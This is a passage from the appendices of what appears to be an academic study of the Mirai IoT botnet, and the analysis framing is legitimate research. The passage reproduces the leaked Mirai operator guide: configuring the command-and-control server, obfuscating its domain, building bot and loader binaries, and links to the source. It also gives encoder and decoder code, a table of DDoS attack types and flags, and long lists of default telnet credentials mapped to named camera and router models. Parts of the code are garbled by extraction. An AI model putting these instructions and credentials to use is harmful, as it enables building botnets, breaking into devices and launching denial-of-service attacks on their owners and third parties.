The output should look like this XOR’ing 20 bytes of data... \x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E \x4B\x41\x47\x0C\x41\x4D\x4F\x22 To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see "XOR’ing 20 bytes of data". This value must replace the last argument tas well. So for example, the table.c line originally looks like this add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47 \x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com Now that we know value from enc tool, we update it like this add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F \x22ÃÊâ∆âü", 20); // fuck.the.police.com Some values are strings, some are port (uint16 in network order / big endian).

A.1.5 Conﬁguring CNC

apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands: http://pastebin.com/86d0iL9g This will create database for you. To add your user, INSERT INTO users VALUES (NULL, ’anna-senpai’, ’myawesomepassword’,0, 0, 0, 0, -1, 1, 30, ”); Now, go into ﬁle ./mirai/cnc/main.go Edit these values

const DatabaseAddr string = "127.0.0.1" const DatabaseUser string = "root" const DatabasePass string = "password" const DatabaseTable string = "mirai"

To the information for the mysql server you just installed

A.1.6 Setting Up Cross Compilers

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc ﬁle for these changes to take eect. http://pastebin.com/1rRCc3aD A.1.7 Building CNC + Bot

The CNC, bot, and related tools: 1. http://santasbigcandycane.cx/mirai.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!

2. http://santasbigcandycane.cx/loader.src.zip - THESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAX - BACK IT UP!

A.1.7.1 How to build bot + CNC

In mirai folder, there is build.sh script.

./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of ﬂoods, etc. Compiles to ./mirai/debug folder

./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/release folder

A.1.8 Building Echo Loader

Loader reads telnet entries from STDIN in following format: ip:port user:pass It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suce as wget. You can ﬁnd code to compile the tiny downloader stub here http://santasbigcandycane.cx/dlr.src.zip You need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb binary, which download the real binary, since echo loading really slow. When you compile, place your dlr.* ﬁles into the folder ./bins for the loader

./build.sh

Will build the loader, optimized, production use, no fuss. If you have a ﬁle in formats used for loading, you can do this

cat file.txt | ./loader

Remember to ulimit! Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like "My bot not connect, ﬁx it" A.2 Custom Data Structures

The Mirai code deﬁnes several custom data structures, the most important of which are listed here.

A.2.1 Connection Structure

Listing A.1. Connection Struct 1 struct server_worker { 2 struct server srv ; 3 int efd ; // We create a separate epoll context per thread so thread safety 4 // isn ’ t our problem 5pthread_tthread; 6uint8_tthread_id; 7}; 8 9 struct server { 10 uint32_t max_open ; 11 volatile uint32_t curr_open ; 12 volatile uint32_t total_input , total_logins , total_echoes , total_wgets , 13 total_tftps, total_successes, total_failures; 14 char wget_host_ip , tftp_host_ip ; 15 struct server_worker workers ; 16 struct connection estab_conns ; 17 ipv4_t bind_addrs ; 18 pthread_t to_thrd ; 19 port_t wget_host_port; 20 uint8_t workers_len, bind_addrs_len; 21 int curr_worker_child ; 22 } ; 23 24 struct binary { 25 char arch [6]; 26 int hex_payloads_len ; 27 char hex_payloads ; 28 } ; 29 30 struct telnet_info { 31 char user [32] , pass [32] , arch [6] , writedir [32]; 32 ipv4_t addr ; 33 port_t port ; 34 enum { 35 UPLOAD_ECHO, 36 UPLOAD_WGET, 37 UPLOAD_TFTP 38 } upload_method ; 39 BOOL has_auth, has_arch; 40 } ; 41 42 struct connection { 43 pthread_mutex_t lock; 44 struct server srv ; 45 struct binary bin ; 46 struct telnet_info info ; 47 int fd , echo_load_pos ; 48 time_t l a s t _ r e c v ; 49 enum { 50 TELNET_CLOSED, // 0 51 TELNET_CONNECTING, // 1 52 TELNET_READ_IACS, // 2 53 TELNET_USER_PROMPT, // 3 54 TELNET_PASS_PROMPT, // 4 55 TELNET_WAITPASS_PROMPT, // 5 56 TELNET_CHECK_LOGIN, // 6 57 TELNET_VERIFY_LOGIN, // 7 58 TELNET_PARSE_PS, // 8 59 TELNET_PARSE_MOUNTS, // 9 60 TELNET_READ_WRITEABLE, // 10 61 TELNET_COPY_ECHO, // 11 62 TELNET_DETECT_ARCH, // 12 63 TELNET_ARM_SUBTYPE, // 13 64 TELNET_UPLOAD_METHODS, // 14 65 TELNET_UPLOAD_ECHO, // 15 66 TELNET_UPLOAD_WGET, // 16 67 TELNET_UPLOAD_TFTP, // 17 68 TELNET_RUN_BINARY, // 18 69 TELNET_CLEANUP // 19 70 } s t a t e _ t e l n e t ; 71 struct { 72 char data [512]; 73 int deadline ; 74 } output_buffer ; 75 uint16_t rdbuf_pos, timeout; 76 BOOL open, success, retry_bin, ctrlc_retry; 77 uint8_t rdbuf[8192]; 78 } ;

A.2.2 Scanner Connection Structure

Listing A.2. Scanner Connection Struct 1 struct scanner_auth { 2 char username ; 3 char password ; 4uint16_tweight_min,weight_max; 5uint8_tusername_len,password_len; 6}; 7 8 struct scanner_connection { 9 struct scanner_auth auth ; 10 int fd , last_recv ; 11 enum { 12 SC_CLOSED, 13 SC_CONNECTING, 14 SC_HANDLE_IACS, 15 SC_WAITING_USERNAME, 16 SC_WAITING_PASSWORD, 17 SC_WAITING_PASSWD_RESP, 18 SC_WAITING_ENABLE_RESP, 19 SC_WAITING_SYSTEM_RESP, 20 SC_WAITING_SHELL_RESP, 21 SC_WAITING_SH_RESP, 22 SC_WAITING_TOKEN_RESP 23 } s t a t e ; 24 ipv4_t dst_addr ; 25 uint16_t dst_port ; 26 int rdbuf_pos ; 27 char rdbuf [SCANNER_RDBUF_SIZE]; 28 uint8_t t r i e s ; 29 } ;

A.2.3 Command and Control Client List

Go implements a data type called channels,(seechan in code) which are "pipes that connect concurrent goroutines" [45]. Essentially, channels allow sending and receiving between goroutines (i.e. functions) while implementing blocking.

Listing A.3. CNC Client List Struct 1 type Bot struct { 2uidint 3connnet.Conn 4versionbyte 5sourcestring 6} 7 8 type ClientList struct { 9uid int 10 count int 11 c l i e n t s map [ int ] Bot 12 addQueue chan Bot 13 delQueue chan Bot 14 atkQueue chan AttackSend 15 totalCount chan int 16 cntView chan int 17 distViewReq chan int 18 distViewRes chan map[ string ] int 19 cntMutex sync .Mutex 20 } A.3 Constants Table

1 / Generic bot info / 2 #d e f i n e TABLE_PROCESS_ARGV 1 3 #d e f i n e TABLE_EXEC_SUCCESS 2 4 #d e f i n e TABLE_CNC_DOMAIN 3 5 #d e f i n e TABLE_CNC_PORT 4 6 7 / Killer data / 8 #d e f i n e TABLE_KILLER_SAFE 5 9 #d e f i n e TABLE_KILLER_PROC 6 10 #d e f i n e TABLE_KILLER_EXE 7 11 #d e f i n e TABLE_KILLER_DELETED 8 / "(deleted)"/ 12 #d e f i n e TABLE_KILLER_FD 9 / "/ fd " / 13 #d e f i n e TABLE_KILLER_ANIME 1 0 / .anime / 14 #d e f i n e TABLE_KILLER_STATUS 1 1 15 #d e f i n e TABLE_MEM_QBOT 1 2 16 #d e f i n e TABLE_MEM_QBOT2 1 3 17 #d e f i n e TABLE_MEM_QBOT3 1 4 18 #d e f i n e TABLE_MEM_UPX 1 5 19 #d e f i n e TABLE_MEM_ZOLLARD 1 6 20 #d e f i n e TABLE_MEM_REMAITEN 1 7 21 22 / Scanner data / 23 #d e f i n e TABLE_SCAN_CB_DOMAIN 1 8 / domain to connect to / 24 #d e f i n e TABLE_SCAN_CB_PORT 1 9 / Port to connect to / 25 #d e f i n e TABLE_SCAN_SHELL 2 0 / ’shell’ to enable shell access / 26 #d e f i n e TABLE_SCAN_ENABLE 2 1 / ’enable’ to enable shell access / 27 #d e f i n e TABLE_SCAN_SYSTEM 2 2 / ’system’ to enable shell access / 28 #d e f i n e TABLE_SCAN_SH 2 3 / ’sh’ to enable shell access / 29 #d e f i n e TABLE_SCAN_QUERY 2 4 / echo hex string to verify login / 30 #d e f i n e TABLE_SCAN_RESP 2 5 / utf8 version of query string / 31 #d e f i n e TABLE_SCAN_NCORRECT 2 6 32 / ’ncorrect’ to fast check for invalid password / ≠ 33 #d e f i n e TABLE_SCAN_PS 2 7 / "/bin/busybox ps" / 34 #d e f i n e TABLE_SCAN_KILL_9 2 8 / "/bin/busybox k i l l 9"/ ≠ 35 36 / Attack strings / 37 #d e f i n e TABLE_ATK_VSE 2 9 / TSource Engine Query / 38 #d e f i n e TABLE_ATK_RESOLVER 3 0 / /etc/resolv.conf / 39 #d e f i n e TABLE_ATK_NSERV 3 1 / "nameserver " / 40 41 #d e f i n e TABLE_ATK_KEEP_ALIVE 3 2 / "Connection: keep alive" / ≠ 42 #d e f i n e TABLE_ATK_ACCEPT 3 3 43 // "Accept: text/html , application/xhtml+xml, application/xml;q=0.9,image/webp, 44 / ;q=0.8" // / 45 #d e f i n e TABLE_ATK_ACCEPT_LNG 3 4 // "Accept Language : en US, en ; q =0.8" ≠ ≠ 46 #d e f i n e TABLE_ATK_CONTENT_TYPE 3 5 47 // "Content Type : application /x www form urlencoded" ≠ ≠ ≠ ≠ 48 #d e f i n e TABLE_ATK_SET_COOKIE 3 6 // " setCookie ( ’" 49 #d e f i n e TABLE_ATK_REFRESH_HDR 3 7 // " refresh :" 50 #d e f i n e TABLE_ATK_LOCATION_HDR 3 8 // " location :" 51 #d e f i n e TABLE_ATK_SET_COOKIE_HDR 3 9 // " set cookie :" ≠ 52 #d e f i n e TABLE_ATK_CONTENT_LENGTH_HDR 4 0 // " content length :" ≠ 53 #d e f i n e TABLE_ATK_TRANSFER_ENCODING_HDR 4 1 // " transfer encoding :" ≠ 54 #d e f i n e TABLE_ATK_CHUNKED 4 2 // " chunked" 55 #d e f i n e TABLE_ATK_KEEP_ALIVE_HDR 4 3 // "keep alive" ≠ 56 #d e f i n e TABLE_ATK_CONNECTION_HDR 4 4 // " connection :" 57 #d e f i n e TABLE_ATK_DOSARREST 4 5 // " server : dosarrest " 58 #d e f i n e TABLE_ATK_CLOUDFLARE_NGINX 4 6 // " server : cloudflare nginx" ≠ 59 60 / User agent strings / 61 #d e f i n e TABLE_HTTP_ONE 4 7 62 / "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 63 Chrome/51.0.2704.103 Safari/537.36" / 64 #d e f i n e TABLE_HTTP_TWO 4 8 65 / "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 66 Chrome/52.0.2743.116 Safari/537.36" / 67 #d e f i n e TABLE_HTTP_THREE 4 9 68 / "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 69 Chrome/51.0.2704.103 Safari/537.36" / 70 #d e f i n e TABLE_HTTP_FOUR 5 0 71 / "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 72 Chrome/52.0.2743.116 Safari/537.36" / 73 #d e f i n e TABLE_HTTP_FIVE 5 1 74 / "Mozilla/5.0 (Macintosh; Intel Mac OSX 10_11_6) AppleWebKit/601.7.7 75 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" / 76 77 #d e f i n e TABLE_MAX_KEYS 5 2 / Highest value + 1 /

A.4 Built-in Encoding and Decoding

A.4.1 Encoding Functionality

1 static uint32_t table_key = 0xdeadbeef ; 2 3 void x(void , int ); 4 5 int main( int argc , char args) 6{ 7 void data ; 8 int len , i ; 9 10 if (argc != 3) 11 { 12 printf("Usage:%s 13 \n", args [0]); 14 return 0; 15 } 16 17 if (strcmp(args[1] , "string") == 0) 18 { 19 data = a r g s [ 2 ] ; 20 len=strlen(args[2])+1; 21 } 22 else if (strcmp(args[1] , "ip") == 0) 23 { 24 data = c a l l o c ( 1 , sizeof (uint32_t)); 25 ((uint32_t )data) = inet_addr(args [2]); 26 l e n = sizeof (uint32_t); 27 } 28 else if (strcmp(args[1] , "uint32") == 0) 29 { 30 data = c a l l o c ( 1 , sizeof (uint32_t)); 31 ((uint32_t )data) = htonl((uint32_t)atoi(args [2])); 32 l e n = sizeof (uint32_t); 33 } 34 else if (strcmp(args[1] , "uint16") == 0) 35 { 36 data = c a l l o c ( 1 , sizeof (uint16_t)); 37 ((uint16_t )data) = htons((uint16_t)atoi(args [2])); 38 l e n = sizeof (uint16_t); 39 } 40 else if (strcmp(args[1] , "uint8") == 0) 41 { 42 data = c a l l o c ( 1 , sizeof (uint8_t)); 43 ((uint8_t )data) = atoi(args [2]); 44 l e n = sizeof (uint8_t); 45 } 46 else if (strcmp(args[1] , "bool") == 0) 47 { 48 data = c a l l o c ( 1 , sizeof ( char )); 49 if (strcmp(args[2] , "false") == 0) 50 ( ( char )data)[0] = 0; 51 else if (strcmp(args[2] , "true") == 0) 52 ( ( char )data)[0] = 1; 53 else 54 { 55 printf("Unknownvalue‘%s‘fordatatypebool!\n", args[2]); 56 return 1; ≠ 57 } 58 l e n = sizeof ( char ); 59 } 60 else 61 { 62 printf("Unknowndatatype‘%s‘!\n", args[1]); 63 return 1; ≠ 64 } 65 66 // Yes we are leaking memory, but the program is so 67 // short lived that it doesn’t really matter... 68 printf("XOR’ing%dbytesofdata...\n", len); 69 data = x ( data , l e n ) ; 70 for (i = 0; i < len; i++) 71 printf("\\x%02X", (( unsigned char )data)[ i ]); 72 p r i n t f ( " \n " ) ; 73 } 74 75 void x(void _buf , int len) 76 { 77 unsigned char buf = (char )_buf, out = malloc ( len ); 78 int i; 79 uint8_t k1 = table_key & 0xff, 80 k2=(table_key>>8)&0xff, 81 k3=(table_key>>16)&0xff, 82 k4=(table_key>>24)&0xff; 83 84 for (i = 0; i < len; i++) 85 { 86 char tmp = buf [ i ] ^ k1 ; 87 88 tmp ^= k2 ; 89 tmp ^= k3 ; 90 tmp ^= k4 ; 91 92 out [ i ] = tmp ; 93 } 94 95 return out ; 96 }

A.4.2 Decoding Functionality

1 static char deobf(char str , int len) 2{ 3 int i; 4 char cpy ; 5 6 len = util_strlen ( str ); 7cpy=malloc( len + 1); 8 9util_memcpy(cpy,str, len + 1); 10 11 for (i = 0; i < len ; i++) 12 { 13 cpy [ i ] ^= 0xDE; 14 cpy [ i ] ^= 0xAD; 15 cpy [ i ] ^= 0xBE ; 16 cpy [ i ] ^= 0xEF ; 17 } 18 19 return cpy ; 20 } 21 22 static void add_auth_entry(char enc_user , char enc_pass , uint16_t weight ) 23 { 24 int tmp ; 25 26 auth_table = realloc(auth_table, (auth_table_len + 1) 27 sizeof ( struct scanner_auth )); 28 auth_table[auth_table_len].username = deobf(enc_user, &tmp); 29 auth_table[auth_table_len].username_len = (uint8_t)tmp; 30 auth_table[auth_table_len].password = deobf(enc_pass, &tmp); 31 auth_table[auth_table_len].password_len = (uint8_t)tmp; 32 auth_table[auth_table_len].weight_min = auth_table_max_weight; 33 auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight; 34 auth_table_max_weight += weight; 35 } 36 37 static struct scanner_auth random_auth_entry(void) 38 { 39 / This method is used to select an auth combination to try. / 40 int i; 41 uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight); 42 43 for (i = 0; i < auth_table_len; i++) 44 { 45 if (r < auth_table[i ].weight_min) 46 continue ; 47 else if (r < auth_table[i ].weight_max) 48 return &auth_table [ i ] ; 49 } 50 51 return NULL ; 52 } Appendix B| Supplemental Data

B.1 Hardcoded List of Default Credentials

Mirai attempts to log into devices via telnet on either port 23 or 2323, using a hardcoded list of default credentials. This list is deﬁned and built in scanner.c within the scanner_init() method.

Username Password 1 666666 666666 2 888888 888888 3 Administrator admin 4 admin [empty string] 5 admin 1111 6 admin 1111111 7 admin 1234 8 admin 12345 9 admin 123456 10 admin 54321 11 admin 7ujMko0admin 12 admin admin 13 admin admin1234 14 admin meinsm 15 admin pass 16 admin password 17 admin smcadmin 18 admin1 password 19 administrator 1234 20 guest 12345 21 guest guest

51 22 mother fucker 23 root [empty string] 24 root 00000000 25 root 1111 26 root 1234 27 root 12345 28 root 123456 29 root 54321 30 root 666666 31 root 7ujMko0admin 32 root 7ujMko0vizxv 33 root 888888 34 root Zte521 35 root admin 36 root anko 37 root default 38 root dreambox 39 root hi3518 40 root ikwb 41 root jvbzd 42 root juantech 43 root klv123 44 root klv1234 45 root pass 46 root password 47 root realtek 48 root root 49 root system 50 root user 51 root vizxv 52 root xc3511 53 root xmhdipc 54 root zlxx. 55 service service 56 supervisor supervisor 57 support support 58 tech tech 59 ubnt ubnt 60 user user Table B.1: Default Credentials Used by Mirai

B.2 Credentials Seen in Collections

The following credentials were all seen in the data collection in this experiment. All hardcoded Mirai credentials were seen in our collections. Many of the other combinations seemed to have been derived from these username and password combinations. Some device identiﬁcation was completed by Brian Krebs in [31]. Many others can be found here: [46] [42] [47] [48] [49]. If unknown, the device ﬁeld is blank. Additionally, please note that even if a product is named, it may not be the only product using those credentials.

Username Password Device, if known In Mirai Release? 1 1234 1234 common password X 2 5up 5up SMC Router X 3 666666 666666 Dahua IP Camera X 4 888888 888888 Dahua DVR or IP Camera X 5 !!Huawei @HuaweiHgw Huawei Router X 6 Admin 111111 common password X 7 Admin 5up SMC Router X 8 Admin Admin common combination X 9 Administrator admin X 10 Administrator default X 11 Administrator meinsm Mobotix Camera? X 12 Administrator password common combination X 13 Huawei Huawei Huawei Router X 14 Manager manager X 15 ROOT PASSWD X 16 Zte521 Zte521 ZTE Router X 17 admin [empty string] common X 18 admin 1 X 19 admin 11 X 20 admin 1111 Xerox Printer X 21 admin 11111 common password X 22 admin 1111111 Samsung Camera X 23 admin 11111111 X 24 admin 123 X 25 admin 1234 common combination X 26 admin 12345 common combination X 27 admin 123456 ACTi IP Camera, Uniview IP X Camera 28 admin 1234567 X 29 admin 12345678 X 30 admin 54321 X 31 admin 5up SMC Router X 32 admin 666666 Dahua IP Camera or DVR X 33 admin 7ujMko0admin Dahua IP Camera X 34 admin 888888 Dahua IP Camera or DVR X 35 admin ZmqVfoSIP X 36 admin admin common combination X 37 admin admin1234 X 38 admin admin888 X 39 admin benq1234 X 40 admin guest X 41 admin ho4uku6at X 42 admin meinsm Mobotix IP Camera X 43 admin oelinux1234 X 44 admin pass common combination X 45 admin password common combination X 46 admin private X 47 admin root common combination X 48 admin smcadmin SMC Router X 49 admin1 password X 50 administrator 1234 X 51 administrator user X 52 adminlvjh adminlvjh123 Chinese IP Camera X 53 cisco cisco Cisco Router X 54 cusadmin highspeed SMC Router X 55 default S2fGqNFs HiSilicon IP Camera X 56 default antslq X 57 default tlJwpbo6 HiSilicon IP Camera X 58 dvr dvr X 59 e8ehome e8ehome Chinese Router X 60 e8ehomeasb e8ehomeasb Chinese Router X 61 e8telnet e8telnet Chinese Router X 62 guest 12345 X 63 guest admin X 64 guest guest X 65 h3c h3c H3C Switch X 66 huawei [email protected] Huawei Router X 67 huawei huawei Huawei Router X 68 mother fucker X 69 netgear netgear Netgear Router X 70 realtek realtek RealTek Router X 71 root [empty string] common combination X 72 root 0 X 73 root 00000000 Panasonic Printer X 74 root 0123456789 X 75 root 1001chin X 76 root 1111 X 77 root 11111 X 78 root 123 X 79 root 1234 X 80 root 12345 Comay Router X 81 root 123456 X 82 root 12345678 X 83 root 123456789 X 84 root 1234567890 X 85 root 4321 X 86 root 54321 Packet8 VOIP Phone X 87 root 5up SMC Router X 88 root 666666 Dahua DVR X 89 root 7ujMko0admin Dahua IP Camera X 90 root 7ujMko0vizxv Dahua IP Camera X 91 root 888888 Dahua DVR X 92 root 88888888 DVR X 93 root GM8182 DVR X 94 root PASSWD X 95 root Zte521 ZTE Router X 96 root admin common combination X 97 root anko ANKO DVR X 98 root cat1029 HiSilicon IP Camera X 99 root cisco Cisco Router X 100 root default X 101 root dreambox Dreambox TV Receiver X 102 root dvr DVR X 103 root friend X 104 root grouter Shida 2110EH Router X 105 root h3c H3C Switch X 106 root hg2x0 Huawei Router X 107 root hi3518 HiSilicon IP Camera X 108 root hunt5759 X 109 root ikwb Toshiba Network Camera X 110 root juantech Guangzhou Juan Optical X DVR 111 root jvbzd HiSilicon IP Camera X 112 root klv123 HiSilicon IP Camera X 113 root klv1234 HiSilicon IP Camera X 114 root nmgx_wapia Chinese Router X 115 root oelinux123 Telstra Mobile Router X 116 root pass Axis IP Camera X 117 root passwd X 118 root password common combination X 119 root private X 120 root realtek RealTek Router X 121 root root X 122 root root123 X 123 root root1234 X 124 root root12345 X 125 root root123456 X 126 root root321 X 127 root root4321 X 128 root root54321 X 129 root root654321 X 130 root rootpassword X 131 root rootroot X 132 root solokey ZKSoftware Device X 133 root system IQinVision IP Camera X 134 root telecomadmin Huawei Router X 135 root telnet X 136 root tl789 X 137 root twe8ehome Chinese Router X 138 root user X 139 root vizxv Dahua Camera X 140 root xc3511 DVR Model Number H.264 X 141 root xmhdipc HiSilicon IP Camera, Shen- X zhen Anran Security Camera 142 root zlxx. EV ZLX Speaker X 143 service service X 144 superadmin Is$uper@dmin Sagem F@st 2804 Router X 145 supervisor supervisor VideoIQ IP Camera X 146 support support X 147 system system X 148 tech tech 3COM (now HP) Router X 149 telecomadmin nE7jA%5m Chinese Router X 150 telnet telnet X 151 telnetadmin telnetadmin X 152 toor toor X 153 ubnt ubnt Ubiquiti AirOS Router, Ubiq- X uiti IP Camera 154 user password common combination X 155 user qweasdzx X 156 user user common combination X 157 useradmin useradmin X 158 zte zte ZTE Router X Table B.2: Credentials Seen in Collections

B.3 Attack Types and Flags

Users with access to a Mirai botnet account is able to execute a set list of attack types. They are all DDoS attacks of varying types and can be found in the attack.go in the mirai/cnc subdirectory. The information is consolidated into the following tables.

Command Flag ID Flag Description Name len 0 Size of packet data, default is 512 bytes rand 1 Randomize packet data content, default is 1 (yes) tos 2 TOS field value in IP header, default is 0 ident 3 ID field value in IP header, default is random ttl 4 TTL field in IP header, default is 255 df 5 Set the Dont-Fragment bit in IP header, default is 0 (no) sport 6 Source port, default is random dport 7 Destination port, default is random domain 8 Domain name to attack dhid 9 Domain name transaction ID, default is random urg 11 Set the URG bit in IP header, default is 0 (no) ack 12 Set the ACK bit in IP header, default is 0 (no) except for ACK flood psh 13 Set the PSH bit in IP header, default is 0 (no) rst 14 Set the RST bit in IP header, default is 0 (no) syn 15 Set the ACK bit in IP header, default is 0 (no) except for SYN flood fin 16 Set the FIN bit in IP header, default is 0 (no) seqnum 17 Sequence number value in TCP header, default is random acknum 18 Ack number value in TCP header, default is random gcip 19 Set internal IP to destination ip, default is 0 (no) method 20 HTTP method name, default is get postdata 21 POST data, default is empty/none path 22 HTTP path, default is / ssl* 23 Use HTTPS/SSL conns 24 Number of connections source 25 Source IP address, 255.255.255.255 for random Table B.3: Attack Flags

* This ﬂag is commented out in the released code and is unused in the given attack list.

Command Attack Attack Description Attack Flags Used Name ID udp 0 UDP flood len, rand, tos, ident, ttl, df, sport, dport, source vse 1 Valve source engine specific tos, ident, ttl, df, sport, dport flood dns 2 DNS resolver flood using the tos, ident, ttl, df, sport, dport, targets domain, input IP is domain, dhid, domain, dhid ignored syn 3 SYN flood tos, ident, ttl, df, sport, dport, urg, ack, psh, rst, syn, fin, seqnum, acknum, source ack 4 ACK flood len, rand, tos, ident, ttl, df, sport, dport, urg, ack, psh, rst, syn, fin, seqnum, acknum, source stomp 5 TCP stomp flood len, rand, tos, ident, ttl, df, dport, urg, ack, psh, rst, syn, fin greip 6 GRE IP flood len, rand, tos, ident, ttl, df, sport, dport, gcip, source greeth 7 GRE Ethernet flood len, rand, tos, ident, ttl, df, sport, dport, gcip, source udpplain 9 UDP flood with less options. len, rand, dport optimized for higher PPS http 10 HTTP flood dport, domain, method, postdata, path, conns Table B.4: Attack Types

B.4 Dieharder Test Output

The rand_next() random number generator found in Mirai was run through the Dieharder test suite [38]. A list of 1 billion integers was generated as input (and put into the ﬁle rand-out.txt). The following is the results output to the terminal.

#======# # dieharder version 3.31.1 Copyright 2003 Robert G. Brown # #======# rng_name | filename |rands/second| file_input| rand-out.txt| 4.75e+06 | #======# test_name |ntup| tsamples |psamples| p-value |Assessment #======# diehard_birthdays| 0| 100| 100|0.83609157| PASSED diehard_operm5| 0| 1000000| 100|0.97382676| PASSED diehard_rank_32x32| 0| 40000| 100|0.75902251| PASSED diehard_rank_6x8| 0| 100000| 100|0.56586170| PASSED diehard_bitstream| 0| 2097152| 100|0.83822111| PASSED diehard_opso| 0| 2097152| 100|0.38470215| PASSED diehard_oqso| 0| 2097152| 100|0.88777437| PASSED diehard_dna| 0| 2097152| 100|0.66601073| PASSED diehard_count_1s_str| 0| 256000| 100|0.86113920| PASSED diehard_count_1s_byt| 0| 256000| 100|0.93104577| PASSED diehard_parking_lot| 0| 12000| 100|0.26814905| PASSED diehard_2dsphere| 2| 8000| 100|0.97837695| PASSED diehard_3dsphere| 3| 4000| 100|0.46256138| PASSED # The file file_input was rewound 1 times diehard_squeeze| 0| 100000| 100|0.30910275| PASSED # The file file_input was rewound 1 times diehard_sums| 0| 100| 100|0.00356192| WEAK # The file file_input was rewound 1 times diehard_runs| 0| 100000| 100|0.63303029| PASSED diehard_runs| 0| 100000| 100|0.29425160| PASSED # The file file_input was rewound 1 times diehard_craps| 0| 200000| 100|0.31877746| PASSED diehard_craps| 0| 200000| 100|0.29224712| PASSED # The file file_input was rewound 3 times marsaglia_tsang_gcd| 0| 10000000| 100|0.12407971| PASSED marsaglia_tsang_gcd| 0| 10000000| 100|0.54303713| PASSED # The file file_input was rewound 3 times sts_monobit| 1| 100000| 100|0.98998524| PASSED # The file file_input was rewound 3 times sts_runs| 2| 100000| 100|0.87578329| PASSED # The file file_input was rewound 3 times sts_serial| 1| 100000| 100|0.95060384| PASSED sts_serial| 2| 100000| 100|0.28310247| PASSED sts_serial| 3| 100000| 100|0.87366236| PASSED sts_serial| 3| 100000| 100|0.24227053| PASSED sts_serial| 4| 100000| 100|0.65691819| PASSED sts_serial| 4| 100000| 100|0.61810062| PASSED sts_serial| 5| 100000| 100|0.64222478| PASSED sts_serial| 5| 100000| 100|0.73623440| PASSED sts_serial| 6| 100000| 100|0.41945001| PASSED sts_serial| 6| 100000| 100|0.76379319| PASSED sts_serial| 7| 100000| 100|0.34143872| PASSED sts_serial| 7| 100000| 100|0.51791054| PASSED sts_serial| 8| 100000| 100|0.27491889| PASSED sts_serial| 8| 100000| 100|0.53411066| PASSED sts_serial| 9| 100000| 100|0.04460440| PASSED sts_serial| 9| 100000| 100|0.67477287| PASSED sts_serial| 10| 100000| 100|0.75382504| PASSED sts_serial| 10| 100000| 100|0.30917173| PASSED sts_serial| 11| 100000| 100|0.70596790| PASSED sts_serial| 11| 100000| 100|0.68132011| PASSED sts_serial| 12| 100000| 100|0.89889121| PASSED sts_serial| 12| 100000| 100|0.25224630| PASSED sts_serial| 13| 100000| 100|0.90279437| PASSED sts_serial| 13| 100000| 100|0.78279920| PASSED sts_serial| 14| 100000| 100|0.59854454| PASSED sts_serial| 14| 100000| 100|0.23992835| PASSED sts_serial| 15| 100000| 100|0.80303002| PASSED sts_serial| 15| 100000| 100|0.49221848| PASSED sts_serial| 16| 100000| 100|0.21368050| PASSED sts_serial| 16| 100000| 100|0.06374385| PASSED # The file file_input was rewound 3 times rgb_bitdist| 1| 100000| 100|0.82129508| PASSED # The file file_input was rewound 3 times rgb_bitdist| 2| 100000| 100|0.05386404| PASSED # The file file_input was rewound 3 times rgb_bitdist| 3| 100000| 100|0.47917126| PASSED # The file file_input was rewound 3 times rgb_bitdist| 4| 100000| 100|0.08809397| PASSED # The file file_input was rewound 3 times rgb_bitdist| 5| 100000| 100|0.89599389| PASSED # The file file_input was rewound 3 times rgb_bitdist| 6| 100000| 100|0.97271183| PASSED # The file file_input was rewound 3 times rgb_bitdist| 7| 100000| 100|0.39831985| PASSED # The file file_input was rewound 4 times rgb_bitdist| 8| 100000| 100|0.97180550| PASSED # The file file_input was rewound 4 times rgb_bitdist| 9| 100000| 100|0.63708607| PASSED # The file file_input was rewound 4 times rgb_bitdist| 10| 100000| 100|0.91685104| PASSED # The file file_input was rewound 4 times rgb_bitdist| 11| 100000| 100|0.06371416| PASSED # The file file_input was rewound 4 times rgb_bitdist| 12| 100000| 100|0.07445471| PASSED # The file file_input was rewound 4 times rgb_minimum_distance| 2| 10000| 1000|0.83797165| PASSED # The file file_input was rewound 4 times rgb_minimum_distance| 3| 10000| 1000|0.54332203| PASSED # The file file_input was rewound 4 times rgb_minimum_distance| 4| 10000| 1000|0.91763093| PASSED # The file file_input was rewound 4 times rgb_minimum_distance| 5| 10000| 1000|0.09081409| PASSED # The file file_input was rewound 5 times rgb_permutations| 2| 100000| 100|0.72550434| PASSED # The file file_input was rewound 5 times rgb_permutations| 3| 100000| 100|0.33484862| PASSED # The file file_input was rewound 5 times rgb_permutations| 4| 100000| 100|0.94350455| PASSED # The file file_input was rewound 5 times rgb_permutations| 5| 100000| 100|0.01577084| PASSED # The file file_input was rewound 5 times rgb_lagged_sum| 0| 1000000| 100|0.23944443| PASSED # The file file_input was rewound 5 times rgb_lagged_sum| 1| 1000000| 100|0.42863661| PASSED # The file file_input was rewound 5 times 